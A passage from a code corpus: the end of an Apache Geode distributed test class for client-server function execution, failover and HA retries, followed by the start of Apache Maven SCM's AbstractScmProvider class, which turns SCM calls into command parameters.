"Function"; } @Override public boolean hasResult() { return true; } }); List resultList = (List) rs.getResult(); assertEquals(3, resultList.size()); assertEquals(Boolean.TRUE, resultList.get(0)); assertEquals(Boolean.TRUE, resultList.get(1)); assertEquals(Boolean.TRUE, resultList.get(2)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation."); } } /* * Execution of the function on server using the name of the function */ @Test public void testServerExecution_SocketTimeOut() { createScenario(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_SOCKET_TIMEOUT); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } @Test public void testServerExecution_SocketTimeOut_WithoutRegister() { createScenario(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_SOCKET_TIMEOUT); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.FALSE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } /* * Ensure that the while executing the function if the servers is down then the execution is * failover to other available server */ @SuppressWarnings("rawtypes") @Test public void testOnServerFailoverWithOneServerDownHA() { // The test code appears to trigger this because the first // call to the function disconnects from the DS but does not call // last result; IgnoredException.addIgnoredException("did not send last result"); createScenario(); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(ClientServerFunctionExecutionDUnitTest::createProxyRegion); function = new TestFunction(true, TestFunction.TEST_FUNCTION_HA_SERVER); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecutionHAOneServerDown(Boolean.FALSE, function, Boolean.FALSE)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.verifyMetaData(1, 1)); } @SuppressWarnings("rawtypes") @Test public void testOnServerFailoverWithTwoServerDownHA() { // The test code appears to trigger this because the first // call to the function disconnects from the DS but does not call // last result; IgnoredException.addIgnoredException("Socket Closed"); IgnoredException.addIgnoredException("did not send last result"); createScenario(); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(ClientServerFunctionExecutionDUnitTest::createProxyRegion); function = new TestFunction(true, TestFunction.TEST_FUNCTION_HA_SERVER); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecutionHATwoServerDown(Boolean.FALSE, function, Boolean.FALSE)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.verifyMetaData(2, 0)); } /* * Ensure that the while executing the function if the servers are down then the execution * shouldn't failover to other available server */ @Test public void testOnServerFailoverNonHA() { // The test code appears to trigger this because the first // call to the function disconnects from the DS but does not call // last result; IgnoredException.addIgnoredException("did not send last result"); createScenario(); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(ClientServerFunctionExecutionDUnitTest::createProxyRegion); function = new TestFunction(true, TestFunction.TEST_FUNCTION_NONHA_SERVER); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecutionNonHA(Boolean.FALSE, function, Boolean.FALSE)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.verifyMetaData(1, 0)); } /* * Execution of the function on a server.Function throws the FunctionInvocationTargetException. As * this is the case of HA then system should retry the function execution. After 5th attempt * function will send Boolean as last result. */ @Test public void testOnServerExecution_FunctionInvocationTargetException() { createScenario(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_ONSERVER_REEXECUTE_EXCEPTION); registerFunctionAtServer(function); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverFunctionExecution_FunctionInvocationTargetException(Boolean.FALSE, function, Boolean.FALSE)); } @Test public void onRegionShouldThrowExceptionWhenThePoolAssociatedWithTheRegionCanNotBeFound() { function = new TestFunction(true, TEST_FUNCTION1); createScenario(); registerFunctionAtServer(function); server1.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server2.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); server3.invoke(ClientServerFunctionExecutionDUnitTest::createReplicatedRegion); client.invoke(() -> { ClientServerFunctionExecutionDUnitTest.createProxyRegion(); assertThatThrownBy(() -> HijackedFunctionService.onRegion(metaDataRegion).execute(function)) .isInstanceOf(IllegalStateException.class) .hasMessageMatching("Could not find a pool named (.*)"); }); } private static class HijackedFunctionService extends FunctionService { public HijackedFunctionService(FunctionExecutionService functionExecutionService) { super(functionExecutionService); } public static Execution onRegion(Region region) { return new HijackedInternalFunctionServiceImpl().onRegion(region); } } private static class HijackedInternalFunctionServiceImpl extends InternalFunctionExecutionServiceImpl { @Override protected Pool findPool(String poolName) { return null; } } private void createScenario() { logger .info("ClientServerFFunctionExecutionDUnitTest#createScenario : creating scenario"); createClientServerScenarionWithoutRegion(); } private static void serverExecution(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); for (int i = 0; i < 20; i++) { assertTrue(((List) (resultList.get(0))).contains("execKey-" + i)); } } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operations"); } } private static void executeRegisteredFunction() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServer(pool); // remove any existing attributes ((AbstractExecution) member).removeFunctionAttributes(TestFunction.TEST_FUNCTION1); ResultCollector rs = member.setArguments(Boolean.TRUE).execute(TestFunction.TEST_FUNCTION1); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); byte[] functionAttributes = ((AbstractExecution) member).getFunctionAttributes(TestFunction.TEST_FUNCTION1); assertNotNull(functionAttributes); } private static void serverExecution_SendException(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); assertTrue(((List) rs.getResult()).get(0) instanceof MyFunctionExecutionException); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); assertEquals((testKeysSet.size() + 1), resultList.size()); Iterator resultIterator = resultList.iterator(); int exceptionCount = 0; while (resultIterator.hasNext()) { Object o = resultIterator.next(); if (o instanceof MyFunctionExecutionException) { exceptionCount++; } } assertEquals(1, exceptionCount); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operations"); } } private static void createReplicatedRegion() { metaDataRegion = cache.createRegionFactory(RegionShortcut.REPLICATE).create(retryRegionName); } public static void createProxyRegion() { CacheServerTestUtil.disableShufflingOfEndpoints(); AttributesFactory factory = new AttributesFactory(); factory.setScope(Scope.LOCAL); factory.setDataPolicy(DataPolicy.EMPTY); factory.setPoolName(pool.getName()); RegionAttributes attrs = factory.create(); metaDataRegion = cache.createRegion(retryRegionName, attrs); assertNotNull(metaDataRegion); } private static void verifyMetaData(Integer arg1, Integer arg2) { try { if (arg1 == 0) { assertNull(metaDataRegion.get("stopped")); } else { assertEquals(metaDataRegion.get("stopped"), arg1); } if (arg2 == 0) { assertNull(metaDataRegion.get("sentresult")); } else { assertEquals(metaDataRegion.get("sentresult"), arg2); } } catch (Exception e) { e.printStackTrace(); fail("The metadata doesn't match with the expected value."); } } public static void verifyDeadAndLiveServers(final Integer expectedLiveServers) { WaitCriterion wc = new WaitCriterion() { String excuse; @Override public boolean done() { int sz = pool.getConnectedServerCount(); logger.info("Checking for the Live Servers : Expected : " + expectedLiveServers + " Available :" + sz); if (sz == expectedLiveServers) { return true; } excuse = "Expected " + expectedLiveServers + " but found " + sz; return false; } @Override public String description() { return excuse; } }; GeodeAwaitility.await().untilAsserted(wc); } private static Object serverExecutionHAOneServerDown(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); ResultCollector rs = null; try { ArrayList<String> args = new ArrayList<>(); args.add(retryRegionName); args.add("serverExecutionHAOneServerDown"); rs = execute(member, args, function, isByName); assertEquals(retryRegionName, ((List) rs.getResult()).get(0)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } return rs.getResult(); } private static void serverExecutionHATwoServerDown(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ArrayList<String> args = new ArrayList<>(); args.add(retryRegionName); args.add("serverExecutionHATwoServerDown"); execute(member, args, function, isByName); fail("Expected ServerConnectivityException not thrown!"); } catch (Exception ex) { if (!(ex instanceof ServerConnectivityException)) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } } private static Object serverExecutionNonHA(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ArrayList<String> args = new ArrayList<>(); args.add(retryRegionName); args.add("serverExecutionNonHA"); execute(member, args, function, isByName); fail("Expected ServerConnectivityException not thrown!"); } catch (Exception ex) { if (!(ex instanceof ServerConnectivityException)) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } return null; } @SuppressWarnings("rawtypes") private static void serverFunctionExecution_FunctionInvocationTargetException(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); ArrayList list = (ArrayList) rs.getResult(); assertEquals("Value of send result of the executed function : " + list.get(0) + "does not match the expected value : " + 1, 1, (int) ((Integer) list.get(0))); assertTrue("Value of last result of the executed function : " + list.get(0) + "is not equal or more than expected value : " + 5, ((Integer) list.get(1)) >= 5); } catch (Exception ex) { ex.printStackTrace(); Assert.fail("This is not expected Exception", ex); } } private static void serverExecution_NoLastResult(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } Execution member = FunctionService.onServer(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); fail("Expected FunctionException : Function did not send last result"); } catch (Exception ex) { assertTrue(ex.getMessage().contains("did not send last result")); } } private static void serverExecution_Inline() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServer(pool); try { ResultCollector rs = member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return getClass().getName(); } @Override public boolean hasResult() { return true; } }); assertEquals(Boolean.TRUE, ((List) rs.getResult()).get(0)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation nn TRUE"); } } private static void serverExecution_Inline_InvalidAttributes() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServer(pool); try { member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return getClass().getName(); } @Override public boolean hasResult() { return false; } @Override public boolean isHA() { return true; } }); fail("Should have failed with Invalid attributes."); } catch (Exception ex) { logger.info("Exception : ", ex); assertTrue( ex.getMessage().contains("For Functions with isHA true, hasResult must also be true.")); } } private static void allServerExecution(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } else { FunctionService.unregisterFunction(function.getId()); assertNull(FunctionService.getFunction(function.getId())); } Execution member = FunctionService.onServers(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); List resultList = (List) rs.getResult(); assertEquals(Boolean.TRUE, resultList.get(0)); assertEquals(Boolean.TRUE, resultList.get(1)); assertEquals(Boolean.TRUE, resultList.get(2)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); assertEquals(3, resultList.size()); for (int j = 0; j < 3; j++) { for (int k = 0; k < 20; k++) { assertTrue((((List) (resultList).get(j)).contains("execKey-" + k))); } } } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } private static void allServerExecution_SendException(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } else { FunctionService.unregisterFunction(function.getId()); assertNull(FunctionService.getFunction(function.getId())); } Execution member = FunctionService.onServers(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); List resultList = (List) rs.getResult(); assertTrue(resultList.get(0) instanceof MyFunctionExecutionException); assertTrue(resultList.get(1) instanceof MyFunctionExecutionException); assertTrue(resultList.get(2) instanceof MyFunctionExecutionException); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } try { final HashSet<String> testKeysSet = new HashSet<>(); for (int i = 0; i < 20; i++) { testKeysSet.add("execKey-" + i); } ResultCollector rs = execute(member, testKeysSet, function, isByName); List resultList = (List) rs.getResult(); assertEquals(((testKeysSet.size() * 3) + 3), resultList.size()); Iterator resultIterator = resultList.iterator(); int exceptionCount = 0; while (resultIterator.hasNext()) { Object o = resultIterator.next(); if (o instanceof MyFunctionExecutionException) { exceptionCount++; } } assertEquals(3, exceptionCount); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation"); } } private static void allServerExecution_NoLastResult(Boolean isByName, Function function, Boolean toRegister) { DistributedSystem.setThreadsSocketPolicy(false); if (toRegister) { FunctionService.registerFunction(function); } else { FunctionService.unregisterFunction(function.getId()); assertNull(FunctionService.getFunction(function.getId())); } Execution member = FunctionService.onServers(pool); try { ResultCollector rs = execute(member, Boolean.TRUE, function, isByName); rs.getResult(); fail("Expected FunctionException : Function did not send last result"); } catch (Exception ex) { assertTrue(ex.getMessage().contains("did not send last result")); } } private static void allServerExecution_Inline() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = FunctionService.onServers(pool); try { ResultCollector rs = member.setArguments(Boolean.TRUE).execute(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Success"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.TRUE); } } @Override public String getId() { return getClass().getName(); } @Override public boolean hasResult() { return true; } }); List resultList = (List) rs.getResult(); assertEquals(Boolean.TRUE, resultList.get(0)); assertEquals(Boolean.TRUE, resultList.get(1)); assertEquals(Boolean.TRUE, resultList.get(2)); } catch (Exception ex) { ex.printStackTrace(); logger.info("Exception : ", ex); fail("Test failed after the execute operation asdfasdfa "); } } private static ResultCollector execute(Execution member, Serializable args, Function function, Boolean isByName) { if (isByName) {// by name logger.info("The function name to execute : " + function.getId()); Execution me = member.setArguments(args); logger.info("The args passed : " + args); return me.execute(function.getId()); } else { // By Instance return member.setArguments(args).execute(function); } } }
apache/maven-scm
35,806
maven-scm-api/src/main/java/org/apache/maven/scm/provider/AbstractScmProvider.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.maven.scm.provider; import java.io.File; import java.util.ArrayList; import java.util.Date; import java.util.List; import org.apache.maven.scm.CommandParameter; import org.apache.maven.scm.CommandParameters; import org.apache.maven.scm.NoSuchCommandScmException; import org.apache.maven.scm.ScmBranch; import org.apache.maven.scm.ScmBranchParameters; import org.apache.maven.scm.ScmException; import org.apache.maven.scm.ScmFileSet; import org.apache.maven.scm.ScmRevision; import org.apache.maven.scm.ScmTagParameters; import org.apache.maven.scm.ScmVersion; import org.apache.maven.scm.command.add.AddScmResult; import org.apache.maven.scm.command.blame.BlameScmRequest; import org.apache.maven.scm.command.blame.BlameScmResult; import org.apache.maven.scm.command.branch.BranchScmResult; import org.apache.maven.scm.command.changelog.ChangeLogScmRequest; import org.apache.maven.scm.command.changelog.ChangeLogScmResult; import org.apache.maven.scm.command.checkin.CheckInScmResult; import org.apache.maven.scm.command.checkout.CheckOutScmResult; import org.apache.maven.scm.command.diff.DiffScmResult; import org.apache.maven.scm.command.edit.EditScmResult; import org.apache.maven.scm.command.export.ExportScmResult; import org.apache.maven.scm.command.info.InfoScmResult; import org.apache.maven.scm.command.list.ListScmResult; import org.apache.maven.scm.command.login.LoginScmResult; import org.apache.maven.scm.command.mkdir.MkdirScmResult; import org.apache.maven.scm.command.remoteinfo.RemoteInfoScmResult; import org.apache.maven.scm.command.remove.RemoveScmResult; import org.apache.maven.scm.command.status.StatusScmResult; import org.apache.maven.scm.command.tag.TagScmResult; import org.apache.maven.scm.command.unedit.UnEditScmResult; import org.apache.maven.scm.command.untag.UntagScmResult; import org.apache.maven.scm.command.update.UpdateScmResult; import org.apache.maven.scm.repository.ScmRepository; import org.apache.maven.scm.repository.ScmRepositoryException; import org.apache.maven.scm.repository.UnknownRepositoryStructure; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * @author <a href="mailto:trygvis@inamo.no">Trygve Laugst&oslash;l</a> * @author <a href="mailto:evenisse@apache.org">Emmanuel Venisse</a> * @author Olivier Lamy */ public abstract class AbstractScmProvider implements ScmProvider { protected final Logger logger = LoggerFactory.getLogger(getClass()); // ---------------------------------------------------------------------- // // ---------------------------------------------------------------------- /** * {@inheritDoc} */ @Override public String getScmSpecificFilename() { return null; } /** * {@inheritDoc} */ @Override public String sanitizeTagName(String tag) { /* by default, we assume all tags are valid. */ return tag; } /** * {@inheritDoc} */ @Override public boolean validateTagName(String tag) { /* by default, we assume all tags are valid. */ return true; } /** * {@inheritDoc} */ @Override public List<String> validateScmUrl(String scmSpecificUrl, char delimiter) { List<String> messages = new ArrayList<>(); try { makeProviderScmRepository(scmSpecificUrl, delimiter); } catch (ScmRepositoryException e) { messages.add(e.getMessage()); } return messages; } /** * {@inheritDoc} */ @Override public boolean requiresEditMode() { return false; } // ---------------------------------------------------------------------- // Scm Implementation // ---------------------------------------------------------------------- /** * {@inheritDoc} */ @Override public AddScmResult add(ScmRepository repository, ScmFileSet fileSet) throws ScmException { return add(repository, fileSet, (String) null); } /** * {@inheritDoc} */ @Override public AddScmResult add(ScmRepository repository, ScmFileSet fileSet, String message) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setString(CommandParameter.MESSAGE, message == null ? "" : message); // TODO: binary may be dependant on particular files though // TODO: set boolean? parameters.setString(CommandParameter.BINARY, "false"); return add(repository.getProviderRepository(), fileSet, parameters); } @Override public AddScmResult add(ScmRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { login(repository, fileSet); if (parameters.getString(CommandParameter.BINARY, null) == null) { // TODO: binary may be dependant on particular files though // TODO: set boolean? parameters.setString(CommandParameter.BINARY, "false"); } return add(repository.getProviderRepository(), fileSet, parameters); } /** * TODO: why public? This should be protected, no? */ public AddScmResult add(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("add"); } /** * {@inheritDoc} */ @Override public BranchScmResult branch(ScmRepository repository, ScmFileSet fileSet, String branchName) throws ScmException { return branch(repository, fileSet, branchName, new ScmBranchParameters()); } /** * {@inheritDoc} */ @Override public BranchScmResult branch(ScmRepository repository, ScmFileSet fileSet, String branchName, String message) throws ScmException { ScmBranchParameters scmBranchParameters = new ScmBranchParameters(); if (message != null && !message.isEmpty()) { scmBranchParameters.setMessage(message); } return branch(repository, fileSet, branchName, scmBranchParameters); } @Override public BranchScmResult branch( ScmRepository repository, ScmFileSet fileSet, String branchName, ScmBranchParameters scmBranchParameters) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setString(CommandParameter.BRANCH_NAME, branchName); parameters.setScmBranchParameters(CommandParameter.SCM_BRANCH_PARAMETERS, scmBranchParameters); return branch(repository.getProviderRepository(), fileSet, parameters); } protected BranchScmResult branch(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("branch"); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public ChangeLogScmResult changeLog( ScmRepository repository, ScmFileSet fileSet, Date startDate, Date endDate, int numDays, String branch) throws ScmException { return changeLog(repository, fileSet, startDate, endDate, numDays, branch, null); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public ChangeLogScmResult changeLog( ScmRepository repository, ScmFileSet fileSet, Date startDate, Date endDate, int numDays, String branch, String datePattern) throws ScmException { ScmBranch scmBranch = null; if (branch != null && !branch.isEmpty()) { scmBranch = new ScmBranch(branch); } return changeLog(repository, fileSet, startDate, endDate, numDays, scmBranch, null); } /** * {@inheritDoc} */ @Override public ChangeLogScmResult changeLog( ScmRepository repository, ScmFileSet fileSet, Date startDate, Date endDate, int numDays, ScmBranch branch) throws ScmException { return changeLog(repository, fileSet, startDate, endDate, numDays, branch, null); } /** * {@inheritDoc} */ @Override public ChangeLogScmResult changeLog( ScmRepository repository, ScmFileSet fileSet, Date startDate, Date endDate, int numDays, ScmBranch branch, String datePattern) throws ScmException { final ChangeLogScmRequest request = new ChangeLogScmRequest(repository, fileSet); request.setDateRange(startDate, endDate); request.setNumDays(numDays); request.setScmBranch(branch); request.setDatePattern(datePattern); return changeLog(request); } /** * {@inheritDoc} */ @Override public ChangeLogScmResult changeLog(ChangeLogScmRequest request) throws ScmException { final ScmRepository scmRepository = request.getScmRepository(); final ScmFileSet scmFileSet = request.getScmFileSet(); login(scmRepository, scmFileSet); return changelog(scmRepository.getProviderRepository(), scmFileSet, request.getCommandParameters()); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public ChangeLogScmResult changeLog(ScmRepository repository, ScmFileSet fileSet, String startTag, String endTag) throws ScmException { return changeLog(repository, fileSet, startTag, endTag, null); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public ChangeLogScmResult changeLog( ScmRepository repository, ScmFileSet fileSet, String startTag, String endTag, String datePattern) throws ScmException { ScmVersion startRevision = null; ScmVersion endRevision = null; if (startTag != null && !startTag.isEmpty()) { startRevision = new ScmRevision(startTag); } if (endTag != null && !endTag.isEmpty()) { endRevision = new ScmRevision(endTag); } return changeLog(repository, fileSet, startRevision, endRevision, null); } /** * {@inheritDoc} */ @Override public ChangeLogScmResult changeLog( ScmRepository repository, ScmFileSet fileSet, ScmVersion startVersion, ScmVersion endVersion) throws ScmException { return changeLog(repository, fileSet, startVersion, endVersion, null); } /** * {@inheritDoc} */ @Override public ChangeLogScmResult changeLog( ScmRepository repository, ScmFileSet fileSet, ScmVersion startVersion, ScmVersion endVersion, String datePattern) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setScmVersion(CommandParameter.START_SCM_VERSION, startVersion); parameters.setScmVersion(CommandParameter.END_SCM_VERSION, endVersion); parameters.setString(CommandParameter.CHANGELOG_DATE_PATTERN, datePattern); return changelog(repository.getProviderRepository(), fileSet, parameters); } protected ChangeLogScmResult changelog( ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("changelog"); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, String tag, String message) throws ScmException { ScmVersion scmVersion = null; if (tag != null && !tag.isEmpty()) { scmVersion = new ScmBranch(tag); } return checkIn(repository, fileSet, scmVersion, message); } /** * {@inheritDoc} */ @Override public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, String message) throws ScmException { return checkIn(repository, fileSet, (ScmVersion) null, message); } /** * {@inheritDoc} */ @Override public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String message) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion); parameters.setString(CommandParameter.MESSAGE, message); return checkin(repository.getProviderRepository(), fileSet, parameters); } @Override public CheckInScmResult checkIn(ScmRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { return checkIn( repository, fileSet, parameters.getScmVersion(CommandParameter.SCM_VERSION, null), parameters.getString(CommandParameter.MESSAGE)); } protected CheckInScmResult checkin( ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("checkin"); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, String tag) throws ScmException { return checkOut(repository, fileSet, tag, true); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, String tag, boolean recursive) throws ScmException { ScmVersion scmVersion = null; if (tag != null && !tag.isEmpty()) { scmVersion = new ScmBranch(tag); } return checkOut(repository, fileSet, scmVersion, recursive); } /** * {@inheritDoc} */ @Override public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet) throws ScmException { return checkOut(repository, fileSet, (ScmVersion) null, true); } /** * {@inheritDoc} */ @Override public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion) throws ScmException { return checkOut(repository, fileSet, scmVersion, true); } /** * {@inheritDoc} */ @Override public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, boolean recursive) throws ScmException { return checkOut(repository, fileSet, (ScmVersion) null, recursive); } /** * {@inheritDoc} */ @Override public CheckOutScmResult checkOut( ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, boolean recursive) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion); parameters.setString(CommandParameter.RECURSIVE, Boolean.toString(recursive)); return checkout(repository.getProviderRepository(), fileSet, parameters); } @Override public CheckOutScmResult checkOut( ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, CommandParameters commandParameters) throws ScmException { login(repository, fileSet); if (scmVersion != null && commandParameters.getScmVersion(CommandParameter.SCM_VERSION, null) == null) { commandParameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion); } return checkout(repository.getProviderRepository(), fileSet, commandParameters); } protected CheckOutScmResult checkout( ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("checkout"); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public DiffScmResult diff(ScmRepository repository, ScmFileSet fileSet, String startRevision, String endRevision) throws ScmException { ScmVersion startVersion = null; ScmVersion endVersion = null; if (startRevision != null && !startRevision.isEmpty()) { startVersion = new ScmRevision(startRevision); } if (endRevision != null && !endRevision.isEmpty()) { endVersion = new ScmRevision(endRevision); } return diff(repository, fileSet, startVersion, endVersion); } /** * {@inheritDoc} */ @Override public DiffScmResult diff( ScmRepository repository, ScmFileSet fileSet, ScmVersion startVersion, ScmVersion endVersion) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); 